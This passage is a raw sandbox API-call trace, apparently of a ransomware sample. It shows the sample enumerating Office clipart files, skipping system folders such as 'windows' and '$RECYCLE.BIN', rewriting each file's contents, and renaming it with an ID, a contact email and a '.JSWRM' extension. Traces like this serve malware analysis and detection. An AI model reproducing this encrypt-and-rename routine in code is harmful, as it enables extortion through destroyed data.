RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0096.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0096.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.946] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6924) returned 1 [0096.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b00) returned 0x205850 [0096.946] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b00, lpOverlapped=0x0) returned 1 [0096.947] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.948] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b00, lpOverlapped=0x0) returned 1 [0096.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.948] CloseHandle (hObject=0x314) returned 1 [0096.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0096.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0096.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0096.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0096.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0096.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0096.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.948] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0096.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0096.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0096.949] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bf8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00915_.WMF", cAlternateFileName="")) returned 1 [0096.949] lstrcmpiW (lpString1="SO00915_.WMF", lpString2=".") returned 1 [0096.949] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="..") returned 1 [0096.949] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="...") returned 1 [0096.949] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="windows") returned -1 [0096.949] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="recovery") returned 1 [0096.949] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="perflogs") returned 1 [0096.950] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="documents and settings") returned 1 [0096.950] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.950] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="system volume information") returned -1 [0096.950] lstrcmpiW (lpString1="SO00915_.WMF", lpString2="msocache") returned 1 [0096.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0096.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00915_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00915_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00915_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0096.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0096.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00915_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00915_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00915_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0096.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0096.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0096.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.950] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7160) returned 1 [0096.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bf0) returned 0x205850 [0096.951] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1bf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1bf0, lpOverlapped=0x0) returned 1 [0096.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.952] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1bf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1bf0, lpOverlapped=0x0) returned 1 [0096.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.953] CloseHandle (hObject=0x314) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0096.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0096.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0096.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0096.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.953] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0096.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0096.954] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00916_.WMF", cAlternateFileName="")) returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2=".") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="..") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="...") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="windows") returned -1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="recovery") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="perflogs") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="documents and settings") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="system volume information") returned -1 [0096.954] lstrcmpiW (lpString1="SO00916_.WMF", lpString2="msocache") returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0096.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00916_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00916_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00916_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0096.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00916_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00916_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00916_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0096.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.956] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4720) returned 1 [0096.956] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1270) returned 0x205850 [0096.956] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1270, lpOverlapped=0x0) returned 1 [0096.958] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.958] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1270, lpOverlapped=0x0) returned 1 [0096.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.958] CloseHandle (hObject=0x314) returned 1 [0096.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0096.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0096.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0096.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0096.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0096.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0096.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.959] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0096.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0096.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.959] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25ac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00917_.WMF", cAlternateFileName="")) returned 1 [0096.959] lstrcmpiW (lpString1="SO00917_.WMF", lpString2=".") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="..") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="...") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="windows") returned -1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="recovery") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="perflogs") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="documents and settings") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="system volume information") returned -1 [0096.960] lstrcmpiW (lpString1="SO00917_.WMF", lpString2="msocache") returned 1 [0096.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0096.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00917_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00917_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00917_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0096.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0096.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00917_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00917_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00917_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0096.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0096.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.961] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9644) returned 1 [0096.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x25a0) returned 0x24d210 [0096.961] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x25a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x25a0, lpOverlapped=0x0) returned 1 [0096.963] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.963] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x25a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, 